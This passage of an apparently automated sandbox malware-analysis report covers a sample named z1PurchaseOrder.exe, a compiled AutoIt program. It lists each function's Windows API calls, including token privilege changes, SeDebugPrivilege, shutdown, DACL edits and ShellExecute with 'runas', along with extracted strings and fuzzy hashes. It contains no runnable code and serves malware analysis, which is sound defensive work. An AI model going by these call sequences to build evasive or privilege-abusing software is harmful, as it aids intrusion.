                                        • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                        • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                          • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                                          • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                                          • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                                          • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                          • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                        • __invoke_watson.LIBCMT ref: 004205CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                                        • String ID: S\
                                        • API String ID: 4084823496-393906132
                                        • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                        • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                        • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                        • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                        • __swprintf.LIBCMT ref: 00434D91
                                        • _wcslen.LIBCMT ref: 00434D9B
                                        • _wcslen.LIBCMT ref: 00434DB0
                                        • _wcslen.LIBCMT ref: 00434DC5
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                        • _memset.LIBCMT ref: 00434E27
                                        • _wcslen.LIBCMT ref: 00434E3C
                                        • _wcsncpy.LIBCMT ref: 00434E6F
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                        • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                        • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                        • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                        • String ID: :$\$\??\%s
                                        • API String ID: 302090198-3457252023
                                        • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                        • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                        • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                        • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                        APIs
                                          • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                        • GetLastError.KERNEL32 ref: 004644B4
                                        • GetCurrentThread.KERNEL32 ref: 004644C8
                                        • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 1312810259-2896544425
                                        • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                        • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                        • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                        • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                          • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\z1PurchaseOrder.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                          • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                          • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                          • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                          • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                          • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                        • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\z1PurchaseOrder.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                          • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                        • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\z1PurchaseOrder.exe,00000004), ref: 0040D7D6
                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                        • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\z1PurchaseOrder.exe,00000004), ref: 00431B0E
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\z1PurchaseOrder.exe,00000004), ref: 00431B3F
                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                        • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                          • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                          • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                          • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                          • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                          • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                          • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                          • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                          • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                          • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                          • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                          • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                          • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                          • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                        • String ID: @GH$@GH$C:\Users\user\Desktop\z1PurchaseOrder.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                        • API String ID: 2493088469-696489905
                                        • Opcode ID: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                        • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                        • Opcode Fuzzy Hash: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                        • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                        APIs
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                        • __wsplitpath.LIBCMT ref: 004038B2
                                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                        • _wcscpy.LIBCMT ref: 004038C7
                                        • _wcscat.LIBCMT ref: 004038DC
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                          • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                          • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                        • _wcscpy.LIBCMT ref: 004039C2
                                        • _wcslen.LIBCMT ref: 00403A53
                                        • _wcslen.LIBCMT ref: 00403AAA
                                        Strings
                                        • _, xrefs: 00403B48
                                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                        • Error opening the file, xrefs: 0042B8AC
                                        • Unterminated string, xrefs: 0042B9BA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                        • API String ID: 4115725249-188983378
                                        • Opcode ID: e410348e96554644cb024ebf95e8b2d2088fffc0e8404256067a24ee959a0054
                                        • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                        • Opcode Fuzzy Hash: e410348e96554644cb024ebf95e8b2d2088fffc0e8404256067a24ee959a0054
                                        • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                        • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                        • FindClose.KERNEL32(00000000), ref: 00434C88
                                        • FindClose.KERNEL32(00000000), ref: 00434C9C
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                        • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                        • FindClose.KERNEL32(00000000), ref: 00434D35
                                        • FindClose.KERNEL32(00000000), ref: 00434D43
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1409584000-438819550
                                        • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                        • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                        • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                        • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Timetime$Sleep
                                        • String ID: BUTTON
                                        • API String ID: 4176159691-3405671355
                                        • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                        • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                        • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                        • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                        APIs
                                          • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                          • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                          • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                          • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                        • _memset.LIBCMT ref: 00445E61
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                        • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                        • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                        • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                        • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                        • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                        • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 3490752873-0
                                        • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                        • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                        • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                        • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0047AA03
                                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                        • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                        • _memset.LIBCMT ref: 0047AB7C
                                        • _wcslen.LIBCMT ref: 0047AC68
                                        • _memset.LIBCMT ref: 0047ACCD
                                        • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                        • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                        Strings
                                        • NULL Pointer assignment, xrefs: 0047AD84
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 1588287285-2785691316
                                        • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                        • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                        • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                        • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                        • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                        • GetLastError.KERNEL32 ref: 00436504
                                        • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 2938487562-3733053543
                                        • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                        • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                        • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                        • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                        APIs
                                        • __swprintf.LIBCMT ref: 00436162
                                        • __swprintf.LIBCMT ref: 00436176
                                          • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                        • __wcsicoll.LIBCMT ref: 00436185
                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                        • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                        • LockResource.KERNEL32(00000000), ref: 004361B5
                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                        • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                        • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                        • LockResource.KERNEL32(?), ref: 004361FD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                        • String ID:
                                        • API String ID: 2406429042-0
                                        • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                        • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                        • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                        • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                        • GetLastError.KERNEL32 ref: 0045D59D
                                        • SetErrorMode.KERNEL32(?), ref: 0045D629
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                        • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                        • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
